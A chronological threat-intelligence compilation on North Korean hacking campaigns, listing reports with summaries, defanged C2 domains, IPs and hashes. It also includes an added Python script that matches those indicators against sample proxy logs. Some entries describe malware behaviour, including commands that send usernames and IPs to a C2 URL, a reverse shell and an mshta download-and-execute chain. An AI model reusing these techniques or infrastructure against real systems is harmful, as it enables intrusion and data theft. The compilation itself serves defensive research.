  • Bankshot implants are distributed from a domain with a name similar to that of the cryptocurrency-lending platform Falcon Coin, but the similarly named domain is not associated with the legitimate entity. The malicious domain falcancoin.io was created December 27, 2017, and was updated on February 19, only a few days before the implants began to appear. These implants are variations of earlier forms of Bankshot, a remote access tool that gives an attacker full capability on a victim’s system. This implant also contains functionality to wipe files and content from the targeted system to erase evidence or perform other destructive actions. Bankshot was first reported by the Department of Homeland Security on December 13, 2017, and has only recently resurfaced in newly compiled variants. The sample we analyzed is 99% similar to the documented Bankshot variants from 2017.
  • The Bankshot implant is attached to a malicious Word document with the filename Agreement.docx. The document appears to be an agreement template for Bitcoin distribution between an unknown individual in Paris and a to-be-determined cryptocurrency exchange. The author of this document is test-pc. It was created February 26 and was submitted from the Netherlands. The document contains an embedded Flash script that exploits CVE-2018-4878 and downloads and executes the DLL implant from falcancoin.io.
  • We discovered two more documents, written in Korean, that exploit the same vulnerability as Agreement.docx. These documents appear to be part of the same campaign and may have been used on different targets. These documents also communicated with falcancoin.io to install Bankshot and also contain themes around cryptocurrency security. Indicators::
  • falcancoin[.]io

Lazarus KillDisks Central American Casino

Date:: 2018-04-03 URL:: https://welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/ https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/ Tags:: Details::

  • Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
  • Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers who relied on Novetta et al’s white papers with hundreds of pages describing the tools used in the attacks – the Polish and Mexican banks; the WannaCryptor outbreak; phishing campaigns against US defense contractors, etc – and provides grounds for the attribution of these attacks to the Lazarus Group.
  • Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
  • One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
  • This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
  • Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers. Indicators::

Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide

Date:: 2018-04-24 URL:: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/ Tags:: Details::

  • McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. In this post, we dive deeply into this campaign.
  • Our investigation into this campaign reveals that the actor used multiple malware implants, including an unknown implant with capabilities similar to Bankshot. From March 18 to 26 we observed the malware operating in multiple areas of the world. This new variant resembles parts of the Destover malware, which was used in the 2014 Sony Pictures attack.
  • Furthermore, the Advanced Threat Research team has discovered Proxysvc, which appears to be an undocumented implant. We have also uncovered additional control servers that are still active and associated with these new implants. Based on our analysis of public and private information from submissions, along with product telemetry, it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017.
  • The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats, including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad, which was used in the Sony Pictures attack. Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. The Advanced Threat Research team uncovered activity related to this campaign in March 2018, when the actors targeted Turkish banks. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries.” Indicators::

SWIFT: Comments on malware reports

Date:: 2018-04-25 URL:: https://swift.com/news-events/press-releases/swift-comments-malware-reports Tags:: Details::

  • Swift is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on Swift’s network or core messaging services.
  • We understand that the malware is designed to hide the traces of fraudulent payments from customers’ local database applications and can only be installed on users’ local systems by attackers that have successfully identified and exploited weaknesses in their local security.
  • We have developed a facility to assist customers in enhancing their security and to spot inconsistencies in their local database records, however the key defence against such attack scenarios remains for users to implement appropriate security measures in their local environments to safeguard their systems - in particular those used to access Swift - against such potential security threats. Such protections should be implemented by users to prevent the injection of malware into, or any misappropriation of, their interfaces and other core systems.
  • Swift is making customers aware of the new facility through its ongoing Security Campaign. Indicators::

NavRAT: US-North Korea Summit As Decoy For Attacks In South Korea

Date:: 2018-05-31 URL:: https://blog.talosintelligence.com/2018/05/navrat.html Tags:: Details:: Indicators::

US v PARK JIN HYOK

Date:: 2018-06-08 URL:: https://justice.gov/opa/press-release/file/1092091/download Tags:: Details::

  • INFRASTRUCTURE: North Korean Computer Networks, The “Brambul” Worm, Use of a Proxy Service, Dynamic DNS (DDNS)
  • THE ATTACK ON SONY: Initiation of Overt Contact and Email Communications, Analysis of Malware and Infected Computers and Technical Details of the Intrusion, Theft of SPE’s Data and Distribution by Email and a Social Media Account Created by the Subjects, The SPE Movie “The Interview”, Social Media Accounts Were Used to Post Links to Malware on Other Social Media Accounts Related to “The Interview”, “Andoson David,” “Watson Henny” and Related Accounts, “Andoson David”, “Watson Henny” and “John Mogabe”, “Yardgen”, Intrusion at Mammoth Screen
  • INTRUSIONS AT FINANCIAL INSTITUTIONS: Bangladesh Bank Cyber-Heist, watsonhenny@gmail.com, yardgen@gmail.co, rsaflam8808@gmail.com, rasel.aflam@gmail.com, NESTEGG, FakeTLS Data Table, DNS Function, Intrusion at the African Bank: Connections to Bangladesh Bank, Watering Hole Campaign Targeting Financial Institutions
  • TARGETING OF OTHER VICTIMS: Defense Contractor Targeting, mrwangchung01@gmail.com, @erica_333u, jongdada02@gmail.com, Targeting of South Korean Entities
  • WANNACRY GLOBAL RANSOMWARE
  • THE “KIM HYON WOO” PERSONA: tty198410@gmail.co, hyon_u@hotmail.co, hyonwoo01@gmail.com, hyonwu@gmail.com, @hyon_u, Brambul Collector Accounts
  • PARK JIN HYOK: Chosun Expo, Dalian, China, ttykim1018@gmail.com, business2008it@gmail.com, surigaemind@hotmail.com, pkj0615710@hotmail.com, mrkimjin123@gmail.com, Access to Chosun Expo Accounts by North Korean IP Indicators::

Banco de Chile - Wiper Attack Just a Cover for $10M SWIFT Heist

Date:: 2018-06-13 URL:: https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/ Tags:: Details::

  • Analysts discovered that the code is actually a modified version of the Buhtrap malware component known as kill_os. The module renders the local operating system and the Master Boot Record (MBR) unreadable by erasing them. Indicators::

New Andariel Reconnaissance Tactics Uncovered

Date:: 2018-07-16 URL:: https://trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html Tags:: Andariel Details::

  • Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this Operation GoldenAxe. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes. Indicators::

Operation AppleJeus Research

Date:: 2018-08-23 URL:: https://securelist.com/operation-applejeus/87553/ Tags:: Applejeus Details::

  • Fallchill
  • New ability to target macOS.
  • Victims were infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited; the application itself showed no signs of malicious behaviour and looked genuine. The malware was delivered via the app's update files. Users installed the program via a download link delivered over email.
  • For macOS users, Celas LLC also provided a native version of its trading app. A hidden autoupdater module is installed in the background to start immediately after installation, and after each system reboot. Indicators::
  • 196.38.48[.]121
  • 185.142.236[.]226
  • 80.82.64[.]91
  • 185.142.239[.]173
  • www.celasllc[.]com/checkupdate.php

DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer Jin Hyok Park

Date:: 2018-09-06 URL:: https://justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and https://documentcloud.org/documents/4834226-2018-09-06-PARK-COMPLAINT-UNSEALED.html Tags:: Details::

  • Nathan P. Shields, FBI, Los Angeles Field Office
  • Park worked for front company Chosun Expo Joint Venture aka Korea Expo Joint Venture aka Chosun Expo Indicators::

NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT

Date:: 2018-10-01 URL:: https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ Tags:: Details:: Indicators::

The most destructive cyber threat right now

Date:: 2018-10-01 URL:: https://zdnet.com/article/north-korea-is-the-most-destructive-cyber-threat-right-now-fireeye/ Tags:: Details:: Indicators::

CISA's analysis of HIDDEN COBRA FASTCash Campaign

Date:: 2018-10-02 URL:: https://cisa.gov/news-events/alerts/2018/10/02/hidden-cobra-fastcash-campaign Tags:: Details:: Indicators::

APT38: Details on New North Korean Regime-Backed Threat Group

Date:: 2018-10-03 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt38-details-on-new-north-korean-regime-backed-threat-group Tags:: APT38 Details::

  • We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar. Indicators::

Recorded Future: Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite

Date:: 2018-10-25 URL:: https://recordedfuture.com/north-korea-internet-usage/ Tags:: Details:: Indicators::

Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts

Date:: 2018-11-01 URL:: https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/ Tags:: Details::

  • Developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator.
  • The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects. Indicators::

Kimsuky: Stolen Pencil Campaign

Date:: 2018-12-05 URL:: https://netscout.com/blog/asert/stolen-pencil-campaign-targets-academia Tags:: Kimsuky Details:: Indicators::

Top secret report: North Korea keeps busting sanctions, evading U.S.-led sea patrols

Date:: 2018-12-14 URL:: https://nbcnews.com/news/north-korea/top-secret-report-north-korea-keeps-busting-sanctions-evading-u-n947926 Tags:: Details:: Indicators::

Group-IB: 2018 Crime Report

Date:: 2018-12-31 URL:: https://explore.group-ib.com/htct/hi-tech_crime_2018 Tags:: Details:: Indicators::

2019

Two Hundred North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea

Date:: 2019-01-30 URL:: https://chosun.com/site/data/html_dir/2019/01/30/2019013000267.html Tags:: Details:: Indicators::

Operation Kabar Cobra

Date:: 2019-02-08 URL:: https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf Tags:: Kimsuky Details:: Indicators::

Operation Smoke Screen

Date:: 2019-04-17 URL:: https://blog.alyac.co.kr/2243 Tags:: Kimsuky Details:: Indicators::

North Korea's Next Weapon of Choice: Cyber

Date:: 2019-04-30 URL:: https://asiasociety.org/magazine/article/north-koreas-next-weapon-choice-cyber Tags:: Details:: Indicators::

ScarCruft: Continues to evolve, introduces Bluetooth harvester

Date:: 2019-05-13 URL:: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ Tags:: ScarCruft Details:: Indicators::

The All-Purpose Sword: North Korea’s Cyber Operations and Strategies

Date:: 2019-06-01 URL:: https://ccdcoe.org/uploads/2019/06/Art_08_The-All-Purpose-Sword.pdf Tags:: Details::

  • According to a 2013 briefing from the South Korean National Assembly by the South Korean National Intelligence Service, North Korean leader Kim Jong-un stated, “Cyberwarfare is an all-purpose sword that guarantees the North Korean People’s Armed Forces ruthless striking capability, along with nuclear weapons and missiles.” Kim has secretly executed all-purpose cyberattacks to achieve his agenda, regardless of North Korea’s diplomatic and economic situation. The “all-purpose sword” has been adapted to the different purposes it has pursued against North Korea’s adversaries, such as creating ransomware for financial gain, a cyberweapon to destroy computer systems, and an invisible espionage tool to accumulate sensitive information. This paper is divided into three parts. The first section discusses the will of North Korea to use cyber warfare for different purposes by explaining how its administrative agencies take charge of different fields but carry out cyber operations to achieve their goals. The second section describes and analyzes the interconnectivity in North Korea’s suspected cyber operations: specifically, Campaign Kimsuky, Operation KHNP, Operation DarkSeoul, Operation Blockbuster, the Bangladesh Central Bank Heist, and Wannacry. The operations will be categorized by operational goals, showing North Korea’s success at achieving its various purposes by these means. In the last section, we suggest a future cyber strategy direction for North Korea based on our analysis of its tactics, techniques and procedures; and how North Korea cooperates with other countries, including countermeasures for countries around the world. Indicators::

JPCERT: Spear Phishing against Cryptocurrency Businesses

Date:: 2019-07-09 URL:: https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html Tags:: Details::

  • The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file Password.txt.lnk
  • This shortcut file contains some commands, and they run when the file is executed
  • The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
  • CryptoCore Indicators::
  • service[.]amzonnews[.]club
  • 75[.]133[.]9[.]84
  • update[.]gdrives[.]top
  • googledrive[.]network
  • drverify[.]dns-cloud[.]net
  • docs[.]googlefiledrive[.]com
  • europasec[.]dnsabr[.]com
  • eu[.]euprotect[.]net
  • 092jb_378v3_1[.]googldocs[.]org
  • gbackup[.]gogleshare[.]xyz
  • drive[.]gogleshare[.]xyz
  • down[.]financialmarketing[.]live
  • drivegoogle[.]publicvm[.]com
  • googledrive[.]publicvm[.]com
  • mskpupdate[.]publicvm[.]com
  • googledrive[.]email
  • iellsfileshare[.]sharedrivegght[.]xyz
  • download[.]showprice[.]xyz
  • downs[.]showprice[.]xyz
  • mdown[.]showprice[.]xyz
  • start[.]showprice[.]xyz
  • u13580130[.]ct[.]sendgrid[.]net

Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups

Date:: 2019-09-13 URL:: https://home.treasury.gov/news/press-releases/sm774 Tags:: Details:: Indicators::

Mac Malware, Spoofs App, Steals User Information

Date:: 2019-09-20 URL:: https://trendmicro.com/en_us/research/19/i/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website.html Tags:: Applejeus Details::

  • We found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to decrypt its encrypted codes, while the second sample, despite using a simpler routine involving a single shell script, actually incorporates a persistence mechanism.
  • The first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the legitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate.
  • It then encodes the collected information using base64 encoding and saves it in a hidden file, /tmp/.info. It then uploads the file to hxxps://appstockfolio.com/panel/upload[.]php using the collected username and machine serial number as identifiers.
  • The script run.sh collects usernames and IP addresses from the infected machine via the following commands: username = 'whoami', ip address = 'curl -s ipecho.net/plain'. It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format: owpqkszz[.]info/link.php?{username}&{ip address}
  • It then creates a simple reverse shell to the C&C server 193[.]37[.]212[.]176. Once connected, the malware author can run shell commands. Indicators::
  • Stockfoli: Trojan.MacOS.GMERA.A
  • Trial_Stockfoli.zip: Trojan.MacOS.GMERA.A
  • com.apple.upd.plist: Trojan.MacOS.GMERA.B
  • run.sh: Trojan.SH.GMERA.B
  • Stockfoli (sample 2): Trojan.MacOS.GMERA.B
  • Trial_Stockfoli.zip (sample 2): Trojan.MacOS.GMERA.B
  • 193.37.212[.]176

Pass the AppleJeus: a mac backdoor written by the infamous lazarus apt group

Date:: 2019-10-12 URL:: https://objective-see.org/blog/blog_0x49.html Tags:: Applejeus Details:: Indicators::

Attackers Create Elaborate Crypto Trading Scheme to Install Malware

Date:: 2019-10-12 URL:: https://bleepingcomputer.com/news/security/attackers-create-elaborate-crypto-trading-scheme-to-install-malware/ Tags:: Applejeus Details::

  • Security researcher MalwareHunterTeam discovered a scheme where an attacker has created a fake company that is offering a free cryptocurrency trading platform called JMT Trader. When this program is installed, it will also infect a victim with a backdoor Trojan. Indicators::

Indian Nuclear Power Plant Attack

Date:: 2019-10-29 URL:: https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/ https://x.com/issuemakerslab/status/1191519079514796032 https://x.com/issuemakerslab/status/1190846548415959040 Tags:: Details::

  • Previously unknown spy tool, which had been spotted in Indian financial institutions and research centers
  • Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
  • ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with ATMDtrack but were not aimed at ATMs. Instead, their list of functions defined them as spy tools, now known as Dtrack.
  • Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations. Indicators::

Lazarus Group Goes 'Fileless' - macOS Threat Served from Cryptocurrency Trading Platform

Date:: 2019-12-04 URL:: https://objective-see.org/blog/blog_0x51.html https://bleepingcomputer.com/news/security/new-macos-threat-served-from-cryptocurrency-trading-platform/ https://x.com/dineshdina04/status/1201834142704394242 Tags:: Details::

  • UnionCryptoTrader
  • Lazarus group continues to target macOS users with ever evolving capabilities. Today, we analyzed a new sample with the ability to remotely download and execute payloads directly from memory! Indicators::

2020

Operation AppleJeus Sequel

Date:: 2020-01-08 URL:: https://securelist.com/operation-applejeus-sequel/95596/ Tags:: Applejeus Details::

  • macOS malware Indicators::
  • c2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg
  • 8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg
  • cb56955b70c87767dee81e23503086c3 WbBot.pkg
  • be37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg
  • bb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg
  • 6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg
  • 55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg
  • 39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg
  • e35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg
  • a9e960948fdac81579d3b752e49aceda WFCUpdater.exe
  • 24B3614D5C5E53E40B42B4E057001770 UnionCryptoTraderSetup.exe
  • 629B9DE3E4B84B4A0AA605A3E9471B31 UnionCryptoUpdater.exe
  • E1953FA319CC11C2F003AD0542BCA822 AdobeUpdator.exe, AdobeARM.exe
  • f221349437f2f6707ecb2a75c3f39145 rasext.dll
  • 055829E7600DBDAE9F381F83F8E4FF36 UnionCryptoTraderSetup.exe
  • F051A18F79736799AC66F4EF7B28594B Unistore.exe
  • wb-bot.org
  • jmttrading.org
  • cyptian.com
  • beastgoc.com
  • private-kurier.com
  • wb-invest.net
  • wfcwallet.com
  • chainfun365.com
  • buckfast-zucht.de
  • invesuccess.com
  • aeroplans.info
  • mydealoman.com
  • unioncrypto.vip
  • 104.168.167.16
  • 23.254.217.53
  • 185.243.115.17
  • 104.168.218.42
  • 95.213.232.170
  • 108.174.195.134
  • 185.228.83.32
  • 172.81.135.194
  • wb-bot[.]org/certpkg.php
  • 95.213.232[.]170/ProbActive/index.do
  • beastgoc[.]com/grepmonux.php
  • unioncrypto[.]vip/update
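The indicator lists in the entries above are published in defanged form (wb-bot[.]org, 193[.]37[.]212[.]176), which is the right way to share them but not the form a proxy log contains. What follows is an added example, not code from this page or from any of the cited reports: it refangs a handful of the AppleJeus indicators listed above, indexes them by host, and scans web-proxy log lines for matches. The Squid-style log layout and the log lines themselves are constructed for the demo and are assumptions, not telemetry from any report. The CONNECT case shows the caveat a practitioner runs into with TLS: the tunnel exposes only the host, so a host/path indicator such as unioncrypto[.]vip/update can never match there and only bare-host indicators can.

```python
"""Normalize the defanged indicators listed in the entries above and match them
against web-proxy log lines.  Added example, not code from the page or from any
vendor report; the log format and the log lines are constructed for the demo."""
import re
from urllib.parse import urlsplit

# Indicators copied from the AppleJeus and AppleJeus Sequel entries above, in
# the defanged form the page uses.  A bare host matches any path on that host;
# a host/path indicator matches only that exact path.
DEFANGED_IOCS = [
    "wb-bot[.]org/certpkg.php",
    "95.213.232[.]170/ProbActive/index.do",
    "beastgoc[.]com/grepmonux.php",
    "unioncrypto[.]vip/update",
    "185.142.236[.]226",
    "www.celasllc[.]com/checkupdate.php",
]

# Common defang spellings: bracketed dots in three styles, hxxp(s), [:] and [@].
_REFANG_RULES = [
    (re.compile(r"\[\.\]|\(\.\)|\{\.\}"), "."),
    (re.compile(r"hxxp", re.IGNORECASE), "http"),
    (re.compile(r"\[:\]"), ":"),
    (re.compile(r"\[@\]"), "@"),
]


def refang(ioc: str) -> str:
    """Return the literal form of a defanged indicator."""
    s = ioc.strip()
    for pattern, replacement in _REFANG_RULES:
        s = pattern.sub(replacement, s)
    return s


def split_ioc(ioc: str):
    """Return (host, path) for an indicator; path is '' for a bare host or IP."""
    s = refang(ioc)
    if "://" not in s:          # urlsplit needs a scheme to locate the host part
        s = "http://" + s
    parts = urlsplit(s)
    return (parts.hostname or "").lower(), parts.path


def build_index(iocs):
    """Map host -> set of indicator paths ('' means any path on that host)."""
    index = {}
    for ioc in iocs:
        host, path = split_ioc(ioc)
        index.setdefault(host, set()).add(path)
    return index


# Constructed Squid-style access-log shape: time, client, status, method, URL.
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+\S+\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)


def parse_target(method: str, url: str):
    """Host and path a log line points at.  For CONNECT (a TLS tunnel) only
    host:port is visible, so the path is '' and only bare-host indicators match."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0].lower(), ""
    parts = urlsplit(url)
    return (parts.hostname or "").lower(), parts.path


def match_line(line: str, index):
    """Return a hit record if the line's destination is an indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None                      # malformed line: skip rather than crash
    host, path = parse_target(m.group("method"), m.group("url"))
    paths = index.get(host)
    if paths is None:
        return None
    if "" in paths or path in paths:
        return {"ts": m.group("ts"), "src": m.group("src"),
                "host": host, "path": path}
    return None


def scan(lines, iocs=DEFANGED_IOCS):
    """Scan log lines against the indicator list and return every hit in order."""
    index = build_index(iocs)
    return [hit for hit in (match_line(line, index) for line in lines) if hit]


# Constructed sample log (not real telemetry); only lines 1, 3 and 4 are hits.
SAMPLE_LOG = [
    "1578470400.101 10.0.0.15 TCP_MISS/200 GET http://wb-bot.org/certpkg.php",
    "1578470401.220 10.0.0.15 TCP_MISS/200 GET http://www.celasllc.com/",
    "1578470402.330 10.0.0.22 TCP_TUNNEL/200 CONNECT 185.142.236.226:443",
    "1578470403.440 10.0.0.31 TCP_MISS/200 GET http://unioncrypto.vip/update",
    "1578470404.550 10.0.0.31 TCP_MISS/404 GET http://example.com/update",
    "not a log line",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['host']}{hit['path']}")
```

The second sample line is deliberately a visit to the celasllc root page rather than to checkupdate.php and is not flagged: the page lists that host only with a path, so treating it as a whole-host block would be a choice the indicator list does not justify. Where the entries list a host both bare and with a path (wb-bot.org appears both ways above), adding the bare form to the list makes every path on it match.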

Deep-Dive: The Lazarus Group

Date:: 2020-02-06 URL:: https://blog.bushidotoken.net/2020/02/deep-dive-lazarus-group.html Tags:: Details::

  • North Korea continues to utilise Lazarus (a/k/a Lab 110 or Unit 180 or Bureau 121) for devastating cyber attacks against any target deemed worthy. Lazarus is certainly a financially motivated APT which generates funds for the regime's developing WMD program - at the peril of global condemnation. North Korea is currently under some of the harshest international sanctions in the world, with China being its single trading partner. Therefore, the regime has created Lazarus as a tool to earn additional funds for financing expensive nuclear weapons development. Cyber attacks appear to be an ideal way for the regime to generate funds and can still sow doubt into the minds of many because some still believe North Korea is not capable of such attacks. It is more than likely Lazarus is plotting or in the midst of another attack campaign, as what North Korea does have is time. Indicators::

Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group

Date:: 2020-03-02 URL:: https://home.treasury.gov/news/press-releases/sm924 Tags:: Details:: Indicators::

How an elaborate North Korean crypto hacking heist fell apart

Date:: 2020-03-05 URL:: https://wired.co.uk/article/north-korea-cryptocurrency-hacking-china Tags:: Details::

  • Two of the usernames adopted were snowsjohn and khaleesi
  • Between July 2018 and April 2019, they handled $100,812,842.54 in cryptocurrency transactions which were linked back to the $250m heist on the crypto exchange. Indicators::

UNC2891: Have Your Cake and Eat it Too?

Date:: 2022-03-16 URL:: https://mandiant.com/resources/unc2891-overview Tags:: UNC2891 Details::

  • UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
  • Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, we have named this CAKETAP.
  • Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems. Indicators::

CISA: Guidance on the North Korean Cyber Threat

Date:: 2020-04-15 URL:: https://cisa.gov/uscert/ncas/alerts/aa20-106a Tags:: Details:: Indicators::

CISA: Alert on TraderTraitor

Date:: 2022-04-18 URL:: https://cisa.gov/uscert/ncas/alerts/aa22-108a Tags:: TraderTraitor Details:: Indicators::

OXT: The North Korean Connection

Date:: 2020-04-29 URL:: https://oxtresearch.com/the-north-korean-connection/ Tags:: Details:: Indicators::

Leery Turtle: Threat Report

Date:: 2020-05-06 URL:: https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf Tags:: Dangerous Password, Leery Turtle Details::

  • Image 1 - Example phishing e-mail imitating Google Drive
  • A password-protected PDF file is sent alongside an LNK shortcut that imitates a text file containing the PDF's password.
    1. When double-clicked, the shortcut file sends an HTTP request to a remote server through the Windows utility mshta.exe. This request is intended to download and execute the first-stage payload.
    2. The attacker's web server responds with a VBS payload, which is then executed. Additional server-side controls are present; for example, the server checks that the User-Agent string matches MSHTA's.
    3. The web server always runs on TCP 8080.
    4. The first-stage payload gathers information about the infected system and sends it to the command and control server.
    5. The C2 server responds with a second-stage VBS payload, which is saved under the %TEMP% directory.
    6. The malware creates a shortcut file named 'xBoxOne.lnk' under the Startup directory as a means of persistence.
  • LNK Shortcut File - Password.txt.lnk Indicators::
  • bit[.]ly/37W6fgx
  • 092jb_378v3_1[.]googldocs[.]org
  • _jfieo2_se[.]drivegooglshare[.]xyz
  • att[.]gdrvupload[.]xyz
  • check[.]onedrvdn[.]co
  • client[.]googleapis[.]online
  • docs[.]gdriveshare[.]top
  • docs[.]googlefiledrive[.]com
  • down[.]financialmarketing[.]live
  • download[.]gdriveupload[.]site
  • drive[.]gogleshare[.]xyz
  • drive[.]googleupload[.]info
  • drivegoogle[.]publicvm[.]com
  • drivelnk[.]liveonedrvshare[.]xyz
  • drives[.]googlecloud[.]live
  • file[.]onedrivecloud[.]store
  • gbackup[.]gogleshare[.]xyz
  • gdocs[.]googleupload[.]info
  • iellsfileshare[.]sharedrivegght[.]xyz
  • mail[.]gdriveupload[.]info
  • mail[.]gmaildrive[.]site
  • mail[.]googleupload[.]info
  • microsoft-update10v[.]amazonaws1[.]info
  • scloud[.]wechart[.]org
  • service[.]amzonnews[.]club
  • start[.]showprice[.]xyz
  • support[.]gdrvcheck[.]co
  • update[.]gdrives[.]top
  • upload[.]gdrives[.]best
  • verify[.]googleauth[.]pro
  • www[.]msupdatepms[.]xyz

CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH

Date:: 2020-05-12 URL:: https://cisa.gov/news-events/alerts/2020/05/12/north-korean-malicious-cyber-activity Tags:: Details::

  • COPPERHEDGE: The Manuscrypt family of malware is used by advanced persistent threat (APT) cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a full-featured Remote Access Tool (RAT) capable of running arbitrary commands, performing system reconnaissance, and exfiltrating data. Six distinct variants have been identified based on network and code features. The variants are categorized based on common code and a common class structure. A symbol remains in some of the implants identifying a class name of WinHTTP_Protocol and later WebPacket.
  • TAINTEDSCRIBE: This report looks at a full-featured beaconing implant and its command modules. These samples use FakeTLS for session authentication and encrypt network traffic with a Linear Feedback Shift Register (LFSR) algorithm. The main executable disguises itself as Microsoft's Narrator. It downloads its command execution module from a command and control (C2) server and then has the capability to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration.
  • PEBBLEDASH: This report looks at a full-featured beaconing implant. This sample uses FakeTLS for session authentication and encrypts network traffic with RC4. It has the capability to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration. Indicators::
